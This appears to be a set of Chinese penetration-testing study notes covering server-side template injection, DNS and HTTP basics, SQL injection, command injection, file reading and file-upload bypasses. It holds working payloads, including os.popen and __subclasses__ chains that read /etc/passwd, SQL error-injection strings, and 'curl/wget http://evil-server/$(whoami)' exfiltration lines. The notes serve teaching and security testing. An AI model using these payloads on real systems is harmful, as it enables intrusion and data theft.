166 | 
167 | - Tornado
168 | 
169 | 引用模块 {% import module %}
170 | 
171 | => {% import os %}{{ os.popen("whoami").read() }}
172 | 
173 | - Flask/Jinja2
174 | - 
175 | {{ config.items() }}
176 | 
177 | {{''.__class__.__mro__[-1].__subclasses__()}}
178 | 
179 | - Django
180 | - 
181 | {{ request }}
182 | 
183 | {% debug %}
184 | 
185 | {% load module %}
186 | 
187 | {% include "x.html" %}
188 | 
189 | {% extends "x.html" %}
190 | 
191 | 
192 | ---
193 | 3.10.4. 目标
194 | 
195 | - 创建对象
196 | - 文件读写
197 | - 远程文件包含
198 | - 信息泄漏 提权
199 | 
200 | 
201 | 
202 | ---
203 | 3.10.5. 相关属性
204 | 
205 | 3.10.5.1. __class__
206 | 
207 | python中的新式类（即显示继承object对象的类）都有一个属性 __class__ 用于获取当前实例对应的类，例如 "".__class__ 就可以获取到字符串实例对应的类
208 | 
209 | 3.10.5.2. __mro__
210 | 
211 | python中类对象的 __mro__ 属性会返回一个tuple对象，其中包含了当前类对象所有继承的基类，tuple中元素的顺序是MRO（Method Resolution Order） 寻找的顺序。
212 | 
213 | 3.10.5.3. __globals__
214 | 
215 | 保存了函数所有的所有全局变量，在利用中，可以使用 __init__ 获取对象的函数，并通过 __globals__ 获取 file os 等模块以进行下一步的利用
216 | 
217 | 3.10.5.4. __subclasses__()
218 | 
219 | python的新式类都保留了它所有的子类的引用，__subclasses__() 这个方法返回了类的所有存活的子类的引用（是类对象引用，不是实例）。  
220 | 
221 | 因为python中的类都是继承object的，所以只要调用object类对象的 __subclasses__() 方法就可以获取想要的类的对象。
222 | 
223 | 
224 | ---
225 | 3.10.6. 常见Payload
226 | 
227 | - ().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read()
228 | 
229 | - ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /").read()' )
230 | 
231 | 
232 | ---
233 | 3.10.7. 绕过技巧
234 | 
235 | 3.10.7.1. 字符串拼接
236 | 
237 | request['__cl'+'ass__'].__base__.__base__.__base__['__subcla'+'sses__']()[60]
238 | 3.10.7.2. 使用参数绕过
239 | params = {     
240 |     'clas': '__class__',    
241 |     'mr': '__mro__',     
242 |  'subc': '__subclasses__' 
243 | } 
244 | data = {     
245 |   "data": "{{''[request.args.clas][request.args.mr][1][request.args.subc]()}}" 
246 | } 
247 | r = requests.post(url, params=params, data=data) 
248 | print(r.text)


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（二).md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（二）
  2 | 
  3 | **1.3. 域名系统**
  4 | 
  5 | 
  6 | 1.3.1. 域名系统工作原理
  7 | 
  8 | DNS解析过程是递归查询的，具体过程如下： 
  9 | 用户要访问域名www.example.com时，先查看本机hosts是否有记录或者本机是否有DNS缓存，如果有，直接返回结果，否则向递归服务器查询该域名的IP地址
 10 | 递归缓存为空时，首先向根服务器查询com顶级域的IP地址
 11 | 根服务器告知递归服务器com顶级域名服务器的IP地址
 12 | 递归向com顶级域名服务器查询负责example.com的权威服务器的IP
 13 | com顶级域名服务器返回相应的IP地址
 14 | 递归向example.com的权威服务器查询www.example.com的地址记录
 15 | 权威服务器告知www.example.com的地址记录
 16 | 递归服务器将查询结果返回客户端 
 17 |  
 18 | 
 19 | 
 20 | ------------
 21 | 
 22 | 1.3.2. 根服务器
 23 | 
 24 | 根服务器是DNS的核心，负责互联网顶级域名的解析，用于维护域的权威信息，并将DNS查询引导到相应的域名服务器。 
 25 | 根服务器在域名树中代表最顶级的 . 域， 一般省略。 
 26 | 13台IPv4根服务器的域名标号为a到m，即a.root-servers.org到m.root-servers.org，所有服务器存储的数据相同，仅包含ICANN批准的TLD域名权威信息。 
 27 | 
 28 | ------------
 29 | 
 30 | 1.3.3. 权威服务器
 31 | 权威服务器上存储域名Zone文件，维护域内域名的权威信息，递归服务器可以从权威服务器获得DNS查询的资源记录。 
 32 | 权威服务器需要在所承载的域名所属的TLD管理局注册，同一个权威服务器可以承载不同TLD域名，同一个域也可以有多个权威服务器。
 33 | 
 34 | ------------
 35 | 
 36 | 1.3.4. 递归服务器
 37 | 递归服务器负责接收用户的查询请求，进行递归查询并响应用户查询请求。在初始时递归服务器仅有记录了根域名的Hint文件。 
 38 | 
 39 | ------------
 40 | 
 41 | 1.3.5. DGA
 42 | DGA（Domain Generate Algorithm，域名生成算法）是一种利用随机字符来生成C&C域名，从而逃避域名黑名单检测的技术手段，常见于botnet中。
 43 | 
 44 | ------------
 45 | 
 46 | 1.3.6. DNS隧道
 47 | DNS隧道工具将进入隧道的其他协议流量封装到DNS协议内，在隧道上传输。这些数据包出隧道时进行解封装，还原数据。 
 48 | 
 49 | ------------
 50 | 
 51 | 
 52 | 
 53 | **1.4. HTTP标准 **
 54 | 
 55 | 1.4.1.1. 请求报文格式
 56 | 
 57 | ```
 58 | 
 59 | <method><request-URL><version> 
 60 | <headers> 
 61 | 
 62 | <entity-body>
 63 | 
 64 | ```
 65 | 
 66 | ------------
 67 | 
 68 | 1.4.1.2. 响应报文格式
 69 | ```
 70 | <version><status><reason-phrase> 
 71 | <headers> 
 72 | 
 73 | <entity-body>
 74 | ```
 75 | 
 76 | 
 77 | ------------
 78 | 1.4.1.3.字段解释
 79 | ```
 80 | method
 81 | HTTP动词
 82 | 常见方法：HEAD / GET / POST / PUT / DELETE / PATCH / OPTIONS / TRACE
 83 | 扩展方法：LOCK / MKCOL / COPY / MOVE
 84 | version
 85 | 报文使用的HTTP版本
 86 | 格式为HTTP/<major>.<minor>
 87 | url
 88 | <scheme>://<user>:<password>@<host>:<port>/<path>
 89 | ```
 90 | 
 91 | ------------
 92 | 
 93 | 1.4.2. 请求头列表
 94 | 
 95 | - Accept
 96 | 指定客户端能够接收的内容类型
 97 | ```
 98 | Accept: text/plain, text/html
 99 | ```
100 | - Accept-Charset
101 | 浏览器可以接受的字符编码集
102 | ```
103 | Accept-Charset: iso-8859-5
104 | ```
105 | - Accept-Encoding
106 | 指定浏览器可以支持的web服务器返回内容压缩编码类型
107 | ```
108 | Accept-Encoding: compress, gzip
109 | ```
110 | - Accept-Language
111 | 浏览器可接受的语言
112 | ```
113 | Accept-Language: en,zh
114 | ```
115 | - Accept-Ranges
116 | 可以请求网页实体的一个或者多个子范围字段
117 | ```
118 | Accept-Ranges: bytes
119 | ```
120 | - Authorization
121 | HTTP授权的授权证书
122 | ```
123 | Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
124 | ```
125 | - Cache-Control 
126 | 指定请求和响应遵循的缓存机制 Cache-Control: no-cache
127 | 
128 | - Connection
129 | 表示是否需要持久连接 // HTTP 1.1默认进行持久连接
130 | Connection: close
131 | 
132 | - Cookie
133 | HTTP请求发送时，会把保存在该请求域名下的所有cookie值一起发送给web服务器
134 | Cookie: role=admin;ssid=1
135 | 
136 | - Content-Length
137 | 请求的内容长度
138 | Content-Length: 348 
139 | 
140 | - Content-Type
141 | 请求的与实体对应的MIME信息
142 | ```
143 | Content-Type: application/x-www-form-urlencoded
144 | ```
145 | 
146 | - Date
147 | 请求发送的日期和时间
148 | Date: Tue, 15 Nov 2010 08:12:31 GMT
149 | 
150 | - Expect
151 | 请求的特定的服务器行为
152 | Expect: 100-continue
153 | 
154 | - From
155 | 发出请求的用户的Email
156 | From: user@email.com
157 | 
158 | - Host
159 | 指定请求的服务器的域名和端口号
160 | Host: www.github.com
161 | 
162 | - If-Match
163 | 只有请求内容与实体相匹配才有效
164 | If-Match: “737060cd8c284d8af7ad3082f209582d”
165 | 
166 | - If-Modified-Since
167 | 如果请求的部分在指定时间之后被修改则请求成功，未被修改则返回304代码
168 | If-Modified-Since: Sat, 29 Oct 2018 19:43:31 GMT
169 | 
170 | - If-None-Match
171 | 如果内容未改变返回304代码，参数为服务器先前发送的Etag，与服务器回应的Etag比较判断是否改变
172 | If-None-Match: “737060cd8c284d8af7ad3082f209582d”
173 | 
174 | - If-Range
175 | 如果实体未改变，服务器发送客户端丢失的部分，否则发送整个实体。参数也为Etag
176 | If-Range: “737060cd8c284d8af7ad3082f209582d”
177 | 
178 | - If-Unmodified-Since
179 | 只在实体在指定时间之后未被修改才请求成功
180 | If-Unmodified-Since: Sat, 29 Oct 2010 19:43:31 GMT
181 | 
182 | - Max-Forwards
183 | 限制信息通过代理和网关传送的时间
184 | Max-Forwards: 10
185 | 
186 | - Pragma
187 | 用来包含实现特定的指令
188 | Pragma: no-cache
189 | 
190 | - Proxy-Authorization
191 | 连接到代理的授权证书
192 | Proxy-Authorization:BasicQWxhZGRpbjpvcGVuIHNlc2FtZQ===
193 | 
194 | - Range
195 | 只请求实体的一部分，指定范围
196 | Range: bytes=500-999
197 | 
198 | - Referer
199 | 先前网页的地址，当前请求网页紧随其后,即来路
200 | Referer: http://www.agesec.com/5210.html
201 | 
202 | - TE
203 | 客户端愿意接受的传输编码，并通知服务器接受接受尾加头信息 TE: trailers,deflate;q=0.5
204 | 
205 | - Upgrade
206 | 向服务器指定某种传输协议以便服务器进行转换（如果支持） Upgrade: HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
207 | 
208 | - User-Agent
209 | User-Agent的内容包含发出请求的用户信息
210 | User-Agent: Mozilla/5.0 (Linux; X11)
211 | 
212 | - Via
213 | 通知中间网关或代理服务器地址，通信协议
214 | Via: 1.0 fred, 1.1 nowhere.com (Apache/1.1)
215 | 
216 | - Warning
217 | 关于消息实体的警告信息
218 | Warn: 199 Miscellaneous warning
219 | 
220 | 
221 | ------------
222 | 
223 | 1.4.3. 响应头列表
224 | - Accept-Ranges
225 | 表明服务器是否支持指定范围请求及哪种类型的分段请求 Accept-Ranges: bytes
226 | 
227 | - Age
228 | 从原始服务器到代理缓存形成的估算时间（以秒计，非负） Age: 12
229 | 
230 | - Allow
231 | 对某网络资源的有效的请求行为，不允许则返回405
232 | Allow: GET, HEAD
233 | 
234 | - Cache-Control
235 | 告诉所有的缓存机制是否可以缓存及哪种类型
236 | Cache-Control: no-cache
237 | 
238 | - Content-Encoding
239 | web服务器支持的返回内容压缩编码类型。
240 | Content-Encoding: gzip
241 | 
242 | - Content-Language
243 | 响应体的语言
244 | Content-Language: en,zh
245 | 
246 | - Content-Length
247 | 响应体的长度
248 | Content-Length: 348
249 | 
250 | - Content-Location
251 | 请求资源可替代的备用的另一地址
252 | Content-Location: /index.htm
253 | 
254 | - Content-MD5
255 | 返回资源的MD5校验值
256 | Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ==
257 | 
258 | - Content-Range
259 | 在整个返回体中本部分的字节位置
260 | Content-Range: bytes 21010-47021/47022
261 | 
262 | - Content-Type
263 | 返回内容的MIME类型
264 | Content-Type: text/html; charset=utf-8
265 | 
266 | - Date
267 | 原始服务器消息发出的时间
268 | Date: Tue, 15 Nov 2010 08:12:31 GMT
269 | 
270 | - ETag
271 | 请求变量的实体标签的当前值
272 | ETag: “737060cd8c284d8af7ad3082f209582d”
273 | 
274 | - Expires
275 | 响应过期的日期和时间
276 | Expires: Thu, 01 Dec 2010 16:00:00 GMT
277 | 
278 | - Last-Modified
279 | 请求资源的最后修改时间
280 | Last-Modified: Tue, 15 Nov 2010 12:45:26 GMT
281 | 
282 | - Location
283 | 用来重定向接收方到非请求URL的位置来完成请求或标识新的资源
284 | Location: http://www.agesec.com/5210.html
285 | 
286 | - Pragma
287 | 包括实现特定的指令，它可应用到响应链上的任何接收方
288 | Pragma: no-cache
289 | 
290 | - Proxy-Authenticate
291 | 它指出认证方案和可应用到代理的该URL上的参数
292 | Proxy-Authenticate: Basic
293 | 
294 | - Refresh
295 | 应用于重定向或一个新的资源被创造，在5秒之后重定向（由网景提出，被大部分浏览器支持）
296 | Refresh: 5; url=http://www.agesec.com/5210.html
297 | 
298 | - Retry-After
299 | 如果实体暂时不可取，通知客户端在指定时间之后再次尝试
300 | Retry-After: 120
301 | 
302 | - Server web
303 | 服务器软件名称
304 | Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
305 | 
306 | - Set-Cookie
307 | 设置Http Cookie Set-Cookie: UserID=JohnDoe; Max-Age=3600; Version=1
308 | 
309 | - Trailer
310 | 指出头域在分块传输编码的尾部存在 Trailer: Max-Forwards
311 | 
312 | - Transfer-Encoding
313 | 文件传输编码
314 | Transfer-Encoding:chunked
315 | 
316 | - Vary
317 | 告诉下游代理是使用缓存响应还是从原始服务器请求
318 | Vary: *
319 | 
320 | - Via
321 | 告知代理客户端响应是通过哪里发送的
322 | Via: 1.0 fred, 1.1 nowhere.com (Apache/1.1)
323 | 
324 | - Warning
325 | 警告实体可能存在的问题
326 | Warning: 199 Miscellaneous warning
327 | 
328 | - WWW-Authenticate
329 | 表明客户端请求实体应该使用的授权方案
330 | WWW-Authenticate: Basic
331 | 
332 | 
333 | ------------
334 | 
335 | 1.4.4. HTTP状态返回代码 1xx（临时响应）
336 | 表示临时响应并需要请求者继续执行操作的状态代码。
337 | 
338 | ![s](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE06762fa135d0dc3167a0609783f7e3f5/8754 "s")
339 | 
340 | 1.4.5. HTTP状态返回代码 2xx （成功
341 | 表示成功处理了请求的状态代码。
342 | ![s](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEc1a7253094877352d182e48d2cc951e3/8756 "s")
343 | 
344 | 1.4.6. HTTP状态返回代码 3xx （重定向）
345 | 表示要完成请求，需要进一步操作。通常，这些状态代码用来重定向。
346 | ![s](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCEc0c10046a9f416b15d40aec7988069dc/8759 "s")
347 | 
348 | 1.4.7. HTTP状态返回代码 4xx（请求错误）
349 | 这些状态代码表示请求可能出错，妨碍了服务器的处理。
350 | ![s](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE92be93f4cf3202545d40f2fd77bc55c6/8758 "s")
351 | 
352 | 1.4.8. HTTP状态返回代码 5xx（服务器错误）
353 | 这些状态代码表示服务器在尝试处理请求时发生内部错误。这些错误可能是服务器本身的错误，而不是请求出错。
354 | 
355 | ![s](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE518f3324c52e8587ad4cead7a7c53fae/8767 "s")


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（五）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（五）
  2 | 
  3 | **3.1 SQL注入漏洞**
  4 | 
  5 | 3.1.1. 注入分类
  6 | SQL注入是一种代码注入技术，用于攻击数据驱动的应用程序。在应用程序中，如果没有做恰当的过滤，则可能使得恶意的SQL语句被插入输入字段中执行（例如将数据库内容转储给攻击者）。
  7 | 3.1.1.1. 按技巧分类
  8 | 根据使用的技巧，SQL注入类型可分为  
  9 | - 盲注
 10 | 布尔盲注：只能从应用返回中推断语句执行后的布尔值
 11 | 时间盲注：应用没有明确的回显，只能使用特定的时间函数来判断
 12 | - 报错注入：应用会显示全部或者部分的报错信息
 13 | - 堆叠注入：有的应用可以加入 ; 后一次执行多条语句
 14 | - 其他
 15 | 
 16 | 
 17 | 3.1.1.2. 按获取数据的方式分类
 18 | 
 19 | 另外也可以根据获取数据的方式分为3类  
 20 | - inband
 21 | 利用Web应用来直接获取数据
 22 | 如报错注入
 23 | 都是通过站点的响应或者错误反馈来提取数据
 24 | - inference
 25 | 通过Web的一些反映来推断数据
 26 | 如布尔盲注和堆叠注入
 27 | 也就是我们通俗的盲注，
 28 | 通过web应用的其他改变来推断数据
 29 | - out of band(OOB)
 30 | 通过其他传输方式来获得数据，比如DNS解析协议和电子邮件
 31 | 
 32 | ------------
 33 | 
 34 | 3.1.2. 注入检测
 35 | 
 36 | 3.1.2.1. 常见的注入点
 37 | 
 38 | - GET/POST/PUT/DELETE参数
 39 | - X-Forwarded-For
 40 | - 文件名
 41 | 
 42 | 3.1.2.2. Fuzz注入点
 43 | - ' / "
 44 | - 1/1
 45 | - 1/0
 46 | - and 1=1
 47 | - " and "1"="1
 48 | - and 1=2
 49 | - or 1=1
 50 | - or 1=
 51 | - ' and '1'='1
 52 | - + - ^ * % /
 53 | - << >> || | & &&
 54 | - ~
 55 | - !
 56 | - @
 57 | - 反引号执行
 58 | 
 59 | 3.1.2.3. 测试用常量
 60 | - @@version
 61 | - @@servername
 62 | - @@language
 63 | - @@spid
 64 | 
 65 | 3.1.2.4. 测试列数
 66 | 例如 http://www.foo.com/index.asp?id=12+union+select+nulll,null-- ，不断增加 null 至不返回
 67 | 
 68 | 3.1.2.5. 报错注入
 69 | - select 1/0
 70 | - select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a
 71 | - extractvalue(1, concat(0x5c,(select user())))
 72 | - updatexml(0x3a,concat(1,(select user())),1)
 73 | - exp(~(SELECT * from(select user())a))
 74 | - ST_LatFromGeoHash((select * from(select * from(select user())a)b))
 75 | - GTID_SUBSET(version(), 1)
 76 | 
 77 | 3.1.2.5.1. 基于geometric的报错注入
 78 | - GeometryCollection((select * from (select * from(select user())a)b))
 79 | - polygon((select * from(select * from(select user())a)b))
 80 | - multipoint((select * from(select * from(select user())a)b))
 81 | - multilinestring((select * from(select * from(select user())a)b))
 82 | - LINESTRING((select * from(select * from(select user())a)b))
 83 | - multipolygon((select * from(select * from(select user())a)b))
 84 | 
 85 | 其中需要注意的是，基于exp函数的报错注入在MySQL 5.5.49后的版本已经不再生效，具体可以参考这个 commit 95825f 。
 86 | 而以上列表中基于geometric的报错注入在这个 commit 5caea4 中被修复，在5.5.x较后的版本中同样不再生效。
 87 | 
 88 | 3.1.2.6. 堆叠注入
 89 | - ;select 1
 90 | 
 91 | 3.1.2.7. 注释符
 92 | - #
 93 | - --+
 94 | - /*xxx*/
 95 | - /*!xxx*/
 96 | - /*!50000xxx*/
 97 | 
 98 | 3.1.2.8. 判断过滤规则
 99 | - 是否有trunc
100 | - 是否过滤某个字符
101 | - 是否过滤关键字
102 | - slash和编码
103 | 
104 | 3.1.2.9. 获取信息
105 | - 判断数据库类型
106 | and exists (select * from msysobjects ) > 0 access数据库
107 | and exists (select * from sysobjects ) > 0 SQLServer数据库
108 | - 判断数据库表
109 | and exsits (select * from admin)
110 | - 版本、主机名、用户名、库名
111 | - 表和字段
112 | 确定字段数（Order By Select Into）
113 | 表名、列名
114 | 
115 | 3.1.2.10. 测试权限
116 | - 文件操作
117 | 读敏感文件
118 | 写shell
119 | - 带外通道
120 | 网络请求
121 | 
122 | 
123 | ------------
124 | 
125 | 3.1.3. 权限提升
126 | 
127 | 3.1.3.1. UDF提权
128 | 
129 | UDF（User Defined Function，用户自定义函数）是MySQL提供的一个功能，可以通过编写DLL扩展为MySQL添加新函数，扩充其功能。  
130 | 当获得MySQL权限之后，即可通过这种方式上传自定义的扩展文件，从MySQL中执行系统命令。
131 | 
132 | ------------
133 | 
134 | 3.1.4. 数据库检测
135 | 
136 | 3.1.4.1. MySQL
137 | 
138 | - sleep sleep(1)
139 | - benchmark BENCHMARK(5000000, MD5('test'))
140 | - 字符串连接
141 | SELECT 'a' 'b'
142 | SELECT CONCAT('some','string')
143 | - version
144 | SELECT @@version
145 | SELECT version()
146 | - 识别用函数
147 | connection_id()
148 | last_insert_id()
149 | row_count()
150 | 
151 | 
152 | 3.1.4.2. Oracle
153 | 
154 | - 字符串连接
155 | 'a'||'oracle' --
156 | -SELECT CONCAT('some','string')
157 | - version
158 | SELECT banner FROM v$version
159 | SELECT banner FROM v$version WHERE rownum=1
160 | 
161 | 3.1.4.3. SQLServer
162 | 
163 | - WAITFOR WAITFOR DELAY '00:00:10';
164 | - SERVERNAME SELECT @@SERVERNAME
165 | - version SELECT @@version
166 | 字符串连接
167 | SELECT 'some'+'string'
168 | - 常量
169 | @@pack_received
170 | @@rowcount
171 | 
172 | 3.1.4.4. PostgreSQL
173 | - sleep pg_sleep(1)
174 | 
175 | 
176 | ------------
177 | 
178 | 3.1.5. 绕过技巧
179 | 
180 | - 编码绕过
181 | 大小写
182 | url编码
183 | html编码
184 | 十六进制编码
185 | unicode编码
186 | - 注释
187 | // -- -- + -- - # /**/ ;%00
188 | 内联注释用的更多，它有一个特性 /!**/ 只有MySQL能识别
189 | e.g. index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
190 | - 只过滤了一次时
191 | union => ununionion
192 | - 相同功能替换
193 | - 函数替换
194 | substring / mid / sub
195 | ascii / hex / bin
196 | benchmark / sleep
197 | - 变量替换
198 | user() / @@user
199 | - 符号和关键字
200 | and / &
201 | or / |
202 | - HTTP参数
203 | HTTP参数污染
204 | id=1&id=2&id=3 根据容器不同会有不同的结果
205 | HTTP分割注入
206 | - 缓冲区溢出
207 | 一些C语言的WAF处理的字符串长度有限，超出某个长度后的payload可能不会被处理
208 | - 二次注入有长度限制时，通过多句执行的方法改掉数据库该字段的长度绕过
209 | 
210 | 
211 | ------------
212 | 
213 | 3.1.6. SQL注入小技巧
214 | 
215 | 3.1.6.1. 宽字节注入
216 | 
217 | 一般程序员用gbk编码做开发的时候，会用 set names 'gbk' 来设定，这句话等同于
218 | set 
219 | character_set_connection = 'gbk', 
220 | character_set_result = 'gbk', 
221 | character_set_client = 'gbk';
222 | 
223 | 漏洞发生的原因是执行了 set character_set_client = 'gbk'; 之后，mysql就会认为客户端传过来的数据是gbk编码的，从而使用gbk去解码，而mysql_real_escape是在解码前执行的。但是直接用 set names 'gbk' 的话real_escape是不知道设置的数据的编码的，就会加 %5c 。此时server拿到数据解码 就认为提交的字符+%5c是gbk的一个字符，这样就产生漏洞了。
224 | 
225 | 解决的办法有三种，第一种是把client的charset设置为binary，就不会做一次解码的操作。第二种是是 mysql_set_charset('gbk') ，这里就会把编码的信息保存在和数据库的连接里面，就不会出现这个问题了。第三种就是用pdo。
226 | 
227 | 还有一些其他的编码技巧，比如latin会弃掉无效的unicode，那么admin%32在代码里面不等于admin，在数据库比较会等于admin。
228 | 
229 | 
230 | ------------
231 | 
232 | 
233 | 
234 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（八）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（八）
  2 | 
  3 | **3.5. 命令注入**
  4 | 
  5 | 3.5.1. 简介
  6 | 命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞
  7 | 该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能，或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。
  8 | ------------
  9 | 
 10 | 3.5.2. 常见危险函数
 11 | 
 12 | 3.5.2.1. PHP
 13 | - system
 14 | - exec
 15 | - passthru
 16 | - shell_exec
 17 | - popen
 18 | - proc_open
 19 | 
 20 | 3.5.2.2. Python
 21 | 
 22 | - system
 23 | - popen
 24 | - subprocess.call
 25 | - spawn
 26 | 
 27 | 3.5.2.3. Java
 28 | - java.lang.Runtime.getRuntime().exec(command)
 29 | 
 30 | 
 31 | 
 32 | ---
 33 | 3.5.3. 常见注入方式
 34 | - 分号分割
 35 | - || && & 分割
 36 | - | 管道符
 37 | - \r\n %d0%a0 换行
 38 | - 反引号解析
 39 | - $() 替换
 40 | - 
 41 | 
 42 | ---
 43 | 3.5.4. 无回显技巧
 44 | 
 45 | 
 46 | - bash反弹shell
 47 | - DNS带外数据
 48 | - http带外
 49 | 
 50 | curl http://evil-server/$(whoami)
 51 | 
 52 | wget http://evil-server/$(whoami)
 53 | - 无带外时利用 sleep 或其他逻辑构造布尔条件
 54 | - 
 55 | 
 56 | ---
 57 | 3.5.5. 常见绕过方式
 58 | 
 59 | 3.5.5.1. 空格绕过
 60 | 
 61 | - < 符号 cat<123
 62 | - \t / %09
 63 | - ${IFS} 其中{}用来截断，比如cat$IFS2会被认为IFS2是变量名。另外，在后面加个$可以起到截断的作用，一般用$9，因为$9是当前系统shell进程的第九个参数的持有者，它始终为空字符串
 64 | 
 65 | 3.5.5.2. 黑名单绕过
 66 | 
 67 | - a=l;b=s;$a$b
 68 | - base64 echo "bHM=" | base64 -d
 69 | - /?in/?s => /bin/ls
 70 | - 连接符 cat /etc/pass'w'd
 71 | - 未定义的初始化变量 cat$x /etc/passwd
 72 | 
 73 | 
 74 | 3.5.5.3. 长度限制绕过
 75 | 
 76 | >wget\ 
 77 | 
 78 | >foo.\ 
 79 | 
 80 | >com 
 81 | 
 82 | ls -t>a 
 83 | 
 84 | sh a
 85 | 
 86 | 上面的方法为通过命令行重定向写入命令，接着通过ls按时间排序把命令写入文件，最后执行 直接在Linux终端下执行的话,创建文件需要在重定向符号之前添加命令 这里可以使用一些诸如w,[之类的短命令，(使用ls /usr/bin/?查看) 如果不添加命令，需要Ctrl+D才能结束，这样就等于标准输入流的重定向 而在php中 , 使用 shell_exec 等执行系统命令的函数的时候 , 是不存在标准输入流的，所以可以直接创建文件
 87 | 
 88 | 
 89 | ---
 90 | 3.5.6. 常用符号
 91 | 
 92 | 3.5.6.1. 命令分隔符
 93 | 
 94 | - %0a / %0d / \n / \r
 95 | - ;
 96 | - & / &&
 97 | 
 98 | 3.5.6.2. 通配符
 99 | 
100 | - 
101 | ```
102 | * 0到无穷个任意字符
103 | ```
104 | 
105 | - ? 一个任意字符
106 | - [  ] 一个在括号内的字符，e.g. [abcd]
107 | - [ - ] 在编码顺序内的所有字符
108 | - [^ ] 一个不在括号内的字符
109 | 
110 | 
111 | 
112 | ---
113 | 3.5.7. 防御
114 | 
115 | - 不使用时禁用相应函数
116 | - 尽量不要执行外部的应用程序或命令
117 | - 做输入的格式检查
118 | - 转义命令中的所有shell元字符
119 | - shell元字符包括 #&;`,|*?~<>^()[]{}$\
120 | - 
121 | 
122 | ---
123 | 3.6. 文件读取
124 | 
125 | 考虑读取可能有敏感信息的文件  
126 | 
127 | 
128 | - 用户目录下的敏感文件
129 | 
130 | .bash_history
131 | 
132 | .zsh_history
133 | 
134 | .profile
135 | 
136 | .bashrc
137 | 
138 | .gitconfig
139 | 
140 | .viminfo
141 | 
142 | passwd
143 | 
144 | - 应用的配置文件
145 | 
146 | /etc/apache2/apache2.conf
147 | 
148 | /etc/nginx/nginx.conf
149 | 
150 | - 应用的日志文件
151 | 
152 | /var/log/apache2/access.log
153 | 
154 | /var/log/nginx/access.log
155 | 
156 | - 站点目录下的敏感文件
157 | 
158 | .svn/entries
159 | 
160 | .git/HEAD
161 | 
162 | WEB-INF/web.xml
163 | 
164 | .htaccess
165 | 
166 | - 特殊的备份文件
167 | 
168 | .swp
169 | 
170 | .swo
171 | 
172 | .bak
173 | 
174 | index.php~
175 | 
176 | …
177 | - Python的Cache
178 | 
179 | __pycache__\__init__.cpython-35.pyc
180 | 
181 | 
182 | ---
183 | 
184 | **3.7. 文件上传**
185 | 
186 | 
187 | 3.7.1. 文件类型检测绕过
188 | 
189 | 3.7.1.1. 更改请求绕过
190 | 
191 | 有的站点仅仅在前端检测了文件类型，这种类型的检测可以直接修改网络请求绕过。同样的，有的站点在后端仅检查了HTTP Header中的信息，比如 Content-Type 等，这种检查同样可以通过修改网络请求绕过。
192 | 
193 | 3.7.1.2. Magic检测绕过
194 | 
195 | 有的站点使用文件头来检测文件类型，这种检查可以在Shell前加入对应的字节以绕过检查。几种常见的文件类型的头字节如下表所示
196 | 
197 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE8d63e9430f618420cd0b2103143eed70/8926)
198 | 
199 | 
200 | 3.7.1.3. 后缀绕过
201 | 
202 | 部分服务仅根据后缀、上传时的信息或Magic Header来判断文件类型，此时可以绕过。  
203 | 
204 | php由于历史原因，部分解释器可能支持符合正则 /ph(p[2-7]?|t(ml)?)/ 的后缀，如 php / php5 / pht / phtml / shtml / pwml / phtm 等 可在禁止上传php文件时测试该类型。  
205 | 
206 | jsp引擎则可能会解析 jspx / jspf / jspa / jsw / jsv / jtml 等后缀，asp支持 asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90} 等后缀。  
207 | 
208 | 除了这些绕过，其他的后缀同样可能带来问题，如 vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini 等。
209 | 
210 | 
211 | 3.7.1.4. 系统命名绕过
212 | 
213 | 在Windows系统中，上传 index.php. 会重命名为 . ，可以绕过后缀检查。也可尝试 
214 | index.php%20， index.php:1.jpg index.php::$DATA 等。在Linux系统中，可以尝试上传名为 index.php/. 或 ./aa/../index.php/. 的文件
215 | 
216 | 
217 | 3.7.1.5. .user.ini
218 | 
219 | 在php执行的过程中，除了主 php.ini 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（$_SERVER[‘DOCUMENT_ROOT’] 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。.user.ini 中可以定义除了PHP_INI_SYSTEM以外的模式的选项，故可以使用 .user.ini 加上非php后缀的文件构造一个shell，比如 auto_prepend_file=01.gif 。
220 | 
221 | 
222 | 3.7.1.6. WAF绕过
223 | 有的waf在编写过程中考虑到性能原因，只处理一部分数据，这时可以通过加入大量垃圾数据来绕过其处理函数。  
224 | 另外，Waf和Web系统对 boundary 的处理不一致，可以使用错误的 boundary 来完成绕过。
225 | 
226 | 
227 | 3.7.1.7. 竞争上传绕过
228 | 有的服务器采用了先保存，再删除不合法文件的方式，在这种服务器中，可以反复上传一个会生成Web Shell的文件并尝试访问，多次之后即可获得Shell。
229 | 
230 | 
231 | ---
